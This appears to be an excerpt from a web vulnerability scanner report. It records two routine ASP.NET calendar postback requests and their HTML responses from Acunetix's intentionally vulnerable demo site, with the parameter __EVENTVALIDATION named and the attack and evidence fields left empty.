Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8375&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIB80RzX2ghkZGS%2BPNBhjEJe8NjYfvgc8u0VAWn7RA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKZx5HtAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCL%2BbSIzu5TpF4lfJmpkEm7KjQIt
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:21 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIB80RzX2ghkZGS+PNBhjEJe8NjYfvgc8u0VAWn7RA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZx5HtAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCL+bSIzu5TpF4lfJmpkEm7KjQIt" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:White" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8312&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAdmGbpdoIZGRk5pDE21Pem%2B4YbCCjbqpPCpZbZxc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B%2Bo6hBQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gISnsD1osdlm0Q50nH8GGD3eF6nIA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:03 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAdmGbpdoIZGRk5pDE21Pem+4YbCCjbqpPCpZbZxc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL++o6hBQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gISnsD1osdlm0Q50nH8GGD3eF6nIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:White" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
